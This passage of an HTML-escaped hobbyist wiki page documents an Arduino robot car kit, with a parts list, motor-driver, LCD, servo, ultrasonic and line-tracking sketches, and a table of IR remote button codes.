  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;18650 Battery Holder&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;DC Motor&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Motor Fixed Part&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Plastic Tire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 40MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Copper Pillar 10MM&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;USB Cable&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Jumper Wire&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;30&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*6MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;60&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*8MM Flat Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;M3*30MM Round Head Screw&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;8&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3MM Nut&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Black)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Connector Wire (150mm, Red)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;6&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;Winding Wire (12CM)&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Assembly ==&lt;br /&gt;
&lt;br /&gt;
Follow the User Manual. If something is unclear then watch a assembly video. Be careful when installing the motors, make sure they’re all properly aligned, if not the car will pull to one side.&lt;br /&gt;
Especially take care that no cables sticks into the motors.&lt;br /&gt;
&lt;br /&gt;
== Motor control ==&lt;br /&gt;
We control the motor using a H-Bridge L298N Motor Driver. Use a exxternal 5V logic supply when using more than 12V driving voltage.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver.png|500px]]&lt;br /&gt;
&lt;br /&gt;
In our case we need to plug two motors to each motorA and motorB. Connect the power from the battery pack VSS and GND.&lt;br /&gt;
&lt;br /&gt;
[[File:Motor_Driver_schematics.png|500px]]&lt;br /&gt;
&lt;br /&gt;
Wire the motor to the Arduino/Sensor Shield as adviced in the user manual.&lt;br /&gt;
&lt;br /&gt;
=== Specification: ===&lt;br /&gt;
* Working Mode: H bridge (double lines)&lt;br /&gt;
* Control Chip: L298N (ST)&lt;br /&gt;
* Logical Voltage: 5V&lt;br /&gt;
* Driving Voltage: 5V-35V&lt;br /&gt;
* Logical Current: 0mA-36mA&amp;gt;&lt;br /&gt;
* Driving Current: 2A (MAX single bridge)&lt;br /&gt;
* Storage Temperature: (-20 °C)-(+135 °C)&lt;br /&gt;
* Maximum Power: 25W&lt;br /&gt;
* Weight: 30g&lt;br /&gt;
* Periphery Dimension: 43 x 43 x 27 mm(L x W x H)&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
==== Initiation ====&lt;br /&gt;
 //define the output pins.&lt;br /&gt;
 int IN1=5;&lt;br /&gt;
 int IN2=6;&lt;br /&gt;
 int IN3=7;&lt;br /&gt;
 int IN4=8;&lt;br /&gt;
 int ENA=9;&lt;br /&gt;
 int ENB=10;&lt;br /&gt;
 void setup() {&lt;br /&gt;
   //set up the pins to act as output.&lt;br /&gt;
   for (int i = 5; i &amp;lt; 11;i++)&lt;br /&gt;
   {&lt;br /&gt;
     pinMode(i,OUTPUT);&lt;br /&gt;
   }&lt;br /&gt;
   delay(5000);&lt;br /&gt;
 }&lt;br /&gt;
==== Rotate Counter Clockwise ====  &lt;br /&gt;
&lt;br /&gt;
 void turnCounterClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Rotate Clockwise ==== &lt;br /&gt;
 void turnClockwise()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,200);&lt;br /&gt;
  analogWrite(ENB,200);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Forward ====&lt;br /&gt;
&lt;br /&gt;
 void driveForward()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,LOW);&lt;br /&gt;
  digitalWrite(IN2,HIGH);&lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(IN3,HIGH);&lt;br /&gt;
  digitalWrite(IN4,LOW);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Drive Reverse ====&lt;br /&gt;
&lt;br /&gt;
 void driveReverse()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
  digitalWrite(IN1,HIGH);&lt;br /&gt;
  digitalWrite(IN2,LOW);&lt;br /&gt;
  &lt;br /&gt;
  digitalWrite(IN3,LOW);&lt;br /&gt;
  digitalWrite(IN4,HIGH);&lt;br /&gt;
  delay(150);&lt;br /&gt;
  analogWrite(ENA,100);&lt;br /&gt;
  analogWrite(ENB,100);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
==== Brake ====&lt;br /&gt;
 void brake()&lt;br /&gt;
 {&lt;br /&gt;
  analogWrite(ENA,0);&lt;br /&gt;
  analogWrite(ENB,0);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== I2C Display ==&lt;br /&gt;
The display is controlled with I2C. I am using the Wire and LiquidCrystal_I2C library to control the display.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
&lt;br /&gt;
* I2C Address: 0x27&lt;br /&gt;
* Back Lit (Blue with white char color)&lt;br /&gt;
* Supply Voltage: 5V&lt;br /&gt;
* Interface:I2C/TWI x1,Gadgeteer interface x2&lt;br /&gt;
* Adjustable Contrast&lt;br /&gt;
* Size:82x35x18 mm&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:I2C_Display_Schematics.png|800px]]&lt;br /&gt;
=== Code ===&lt;br /&gt;
&amp;lt;div style=&amp;quot;border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify&amp;quot;&amp;gt;&amp;lt;b&amp;gt;Note&amp;lt;/b&amp;gt;: Don&#039;t use the library link that is in the manual, it contains a bug where only the first character of the strings is displayed on the I2C display. Download the latest version from https://www.arduinolibraries.info/libraries/liquid-crystal-i2-c.&lt;br /&gt;
&amp;lt;/div&amp;gt; &lt;br /&gt;
 #include &amp;lt;Wire.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;LiquidCrystal_I2C.h&amp;gt;&lt;br /&gt;
 //set the LCD address to 0x27 for a 16 chars and 2 line display&lt;br /&gt;
 LiquidCrystal_I2C lcd(0x27,16,2);&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
  //initialize the lcd&lt;br /&gt;
  lcd.init();&lt;br /&gt;
  //enable the backlight &lt;br /&gt;
  lcd.backlight();&lt;br /&gt;
  //set the cursor to the first line.&lt;br /&gt;
  lcd.setCursor(3,0);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;Hello&amp;quot;);&lt;br /&gt;
  //set the cursor in the next line.&lt;br /&gt;
  lcd.setCursor(3,1);&lt;br /&gt;
  //print text&lt;br /&gt;
  lcd.print(&amp;quot;world!&amp;quot;);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop()&lt;br /&gt;
 {}&lt;br /&gt;
&lt;br /&gt;
== Servo Motor ==&lt;br /&gt;
The Servo Motor is controlled with PWM. The Sketch rotates the motor in an angle between 110 and 180 degres.&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Servo_Motor_Schematics.png|400px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 int servopin=2;// select digital pin 9 for servomotor signal line&lt;br /&gt;
 int myangle;// initialize angle variable&lt;br /&gt;
 int pulsewidth;// initialize width variable&lt;br /&gt;
 int val;&lt;br /&gt;
 &lt;br /&gt;
 void servopulse(int servopin,int myangle)// define a servo pulse function&lt;br /&gt;
 {&lt;br /&gt;
   pulsewidth=(myangle*11)+500;// convert angle to 500-2480 pulse width&lt;br /&gt;
   digitalWrite(servopin,HIGH);// set the level of servo pin as “high”&lt;br /&gt;
   delayMicroseconds(pulsewidth);// delay microsecond of pulse width&lt;br /&gt;
   digitalWrite(servopin,LOW);// set the level of servo pin as “low”&lt;br /&gt;
   delay(20-pulsewidth/1000);&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
   pinMode(servopin,OUTPUT);// set servo pin as “output”&lt;br /&gt;
   Serial.begin(9600);// connect to serial port, set baud rate at “9600”&lt;br /&gt;
   Serial.println(&amp;quot;ready&amp;quot; ) ;&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop(){&lt;br /&gt;
   val = 180;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
   val = 110;&lt;br /&gt;
   Serial.print(&amp;quot;moving servo to &amp;quot;);&lt;br /&gt;
   Serial.print(val);&lt;br /&gt;
   Serial.println();&lt;br /&gt;
   for(int i=0;i&amp;lt;=25;i++) // giving the servo time to rotate to commanded position&lt;br /&gt;
   {&lt;br /&gt;
     servopulse(servopin,val);// use the pulse function&lt;br /&gt;
   }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Ultra Sonic Sensor ==&lt;br /&gt;
I used the pins: echoPin 3 and trigPin 4 because 7 and 8 is already taken by the motordriver.&lt;br /&gt;
If you don&#039;t understand the line: distance = duration/58.3;.&lt;br /&gt;
The speed of sound is 343 m/s. We messure the round trip so we need to divide the 343 with 2 which gives us 171.5 m/s. But we don’t want to deal with meters and seconds we want centimeters and microseconds. 17150 cm/s = 0.017150 cm/us = 1cm/58.3 us.&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Working Voltage: DC 5V&lt;br /&gt;
* Working Current: 15mA&lt;br /&gt;
* Working Frequency: 40Hz&lt;br /&gt;
* Max Range: 4m&lt;br /&gt;
* Min Range: 2cm&lt;br /&gt;
* Measuring Angle: 15 degree&lt;br /&gt;
* Trigger Input Signal: 10µS TTL pulse&lt;br /&gt;
* Echo Output Signal Input TTL lever signal and the range in proportion&lt;br /&gt;
* Size: 46*20.4mm&lt;br /&gt;
* Weight: 9g&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Ultra_Sonic_Schematics.png|650px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
&lt;br /&gt;
 #define echoPin 7 // Echo Pin&lt;br /&gt;
 #define trigPin 8 // Trigger Pin&lt;br /&gt;
 #define LEDPin 13 // Onboard LED&lt;br /&gt;
 &lt;br /&gt;
 int maximumRange = 200; // Maximum range needed&lt;br /&gt;
 int minimumRange = 0; // Minimum range needed&lt;br /&gt;
 long duration, distance; // Duration used to calculate distance&lt;br /&gt;
 &lt;br /&gt;
 void setup() {&lt;br /&gt;
  Serial.begin (9600);&lt;br /&gt;
  pinMode(trigPin, OUTPUT);&lt;br /&gt;
  pinMode(echoPin, INPUT);&lt;br /&gt;
  pinMode(LEDPin, OUTPUT); // Use LED indicator (if required)&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 void loop() {&lt;br /&gt;
 /* The following trigPin/echoPin cycle is used to determine the&lt;br /&gt;
  distance of the nearest object by bouncing soundwaves off of it. */ &lt;br /&gt;
  digitalWrite(trigPin, LOW); &lt;br /&gt;
  delayMicroseconds(2); &lt;br /&gt;
 &lt;br /&gt;
  digitalWrite(trigPin, HIGH);&lt;br /&gt;
  delayMicroseconds(10); &lt;br /&gt;
  digitalWrite(trigPin, LOW);&lt;br /&gt;
  duration = pulseIn(echoPin, HIGH);&lt;br /&gt;
  &lt;br /&gt;
  //Calculate the distance (in cm) based on the speed of sound.&lt;br /&gt;
  distance = duration/58.3;&lt;br /&gt;
 &lt;br /&gt;
  if (distance &amp;gt;= maximumRange || distance &amp;lt;= minimumRange){&lt;br /&gt;
   /* Send a negative number to computer and Turn LED ON &lt;br /&gt;
   to indicate &amp;quot;out of range&amp;quot; */&lt;br /&gt;
   Serial.println(&amp;quot;-1&amp;quot;);&lt;br /&gt;
   digitalWrite(LEDPin, HIGH); &lt;br /&gt;
  }&lt;br /&gt;
  else {&lt;br /&gt;
   /* Send the distance to the computer using Serial protocol, and&lt;br /&gt;
   turn LED OFF to indicate successful reading. */&lt;br /&gt;
   Serial.println(distance);&lt;br /&gt;
   digitalWrite(LEDPin, LOW); &lt;br /&gt;
  } &lt;br /&gt;
  //Delay 50ms before next reading.&lt;br /&gt;
  delay(50);&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Line Tracking Sensor ==&lt;br /&gt;
&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: +5V&lt;br /&gt;
* Operating Current: &amp;lt;10mA&lt;br /&gt;
* Operating Temperature Range: 0°C ~ + 50°C&lt;br /&gt;
* Output Interface: 3-wire interface (1 - signal, 2 - power, 3 - power supply negative)&lt;br /&gt;
* Output Level: TTL level&lt;br /&gt;
&lt;br /&gt;
=== Schematics ===&lt;br /&gt;
[[File:Line_Tracking_Sensor_Schematics.png|600px]]&lt;br /&gt;
&lt;br /&gt;
=== Code ===&lt;br /&gt;
I used the pins 0-2 for the 3 line tracking sensors. This sketch is used to test the line tracking sensors.&lt;br /&gt;
 const int sensorPin1 = 0;&lt;br /&gt;
 const int sensorPin2 = 1;&lt;br /&gt;
 const int sensorPin3 = 2; // the number of the sensor pin&lt;br /&gt;
 const int ledPin = 13;      // the number of the LED pin&lt;br /&gt;
 int sensorState = 0;         // variable for reading the sensor status&lt;br /&gt;
 void setup()&lt;br /&gt;
 {&lt;br /&gt;
     pinMode(ledPin, OUTPUT);&lt;br /&gt;
     pinMode(sensorPin1, INPUT);&lt;br /&gt;
     pinMode(sensorPin2, INPUT);&lt;br /&gt;
     pinMode(sensorPin3, INPUT);&lt;br /&gt;
 }&lt;br /&gt;
 void loop()&lt;br /&gt;
 {&lt;br /&gt;
     // read the state of the sensor value:&lt;br /&gt;
     sensorState = digitalRead(sensorPin1);&lt;br /&gt;
     // if the sensorState is HIGH:&lt;br /&gt;
     if (sensorState == HIGH)&lt;br /&gt;
     {&lt;br /&gt;
         digitalWrite(ledPin, HIGH);&lt;br /&gt;
     }&lt;br /&gt;
     else&lt;br /&gt;
     {&lt;br /&gt;
         digitalWrite(ledPin, LOW);&lt;br /&gt;
     }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
== Digital IR Receiver Module ==&lt;br /&gt;
=== Specification ===&lt;br /&gt;
* Power Supply: 5V&lt;br /&gt;
* Interface: Digital&lt;br /&gt;
* Modulate Frequency: 38kHz&lt;br /&gt;
* Module Interface Socket: JST PH2.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table style=&amp;quot;border: solid 1px black; width:50%   border-collapse: collapse; border-spacing: 0;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:30%; padding: 5px 10px; text-align: center;&amp;quot;&amp;gt;Button&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;HexValue&amp;lt;/th&amp;gt;&lt;br /&gt;
    &amp;lt;th style=&amp;quot;border: solid 1px black; width:20%; text-align: center; padding: 5px 10px;&amp;quot;&amp;gt;DecValue&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowUp&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF629D&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16736925&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowDown&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFA857&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16754775&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowRight&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFC23D&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16761405&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;ArrowLeft&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF22DD&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16720605&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;1&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF6897&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16738455&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;2&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF9867&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16750695&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;3&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FFB04F&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16756815&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;/tr&amp;gt;&lt;br /&gt;
  &amp;lt;tr style=&amp;quot;border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;4&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;FF30CF&amp;lt;/td&amp;gt;&lt;br /&gt;
    &amp;lt;td style=&amp;quot;text-align: center; border: solid 1px black; padding: 5px 10px;&amp;quot;&amp;gt;16724175&amp;lt;/td&amp;gt;&lt;br /&gt;
